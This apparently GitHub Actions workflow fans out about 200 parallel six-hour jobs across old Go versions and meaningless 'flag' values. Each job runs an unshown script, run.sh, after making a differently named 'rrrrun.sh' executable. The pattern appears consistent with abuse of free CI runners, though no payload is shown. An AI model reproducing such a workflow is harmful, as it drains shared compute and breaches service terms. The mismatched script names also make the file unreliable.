name: DHED
on: [push, pull_request]
jobs:
  build:
    name: Ellenunderwater_Github
    runs-on: ubuntu-18.04
    strategy:
      max-parallel: 250
      fail-fast: false
      matrix:
        go: [1.1, 1.2, 1.3, 1.4, 1.5, 1.6, 1.7, 1.8, 1.9, 1.10]
        flag: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20]
    timeout-minutes: 360
    env:
        NUM_JOBS: 250
        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: Setup
      uses: actions/checkout@v1
    - name: runner_go
      run: |
        chmod +x "${GITHUB_WORKSPACE}/rrrrun.sh"
        "${GITHUB_WORKSPACE}/run.sh"
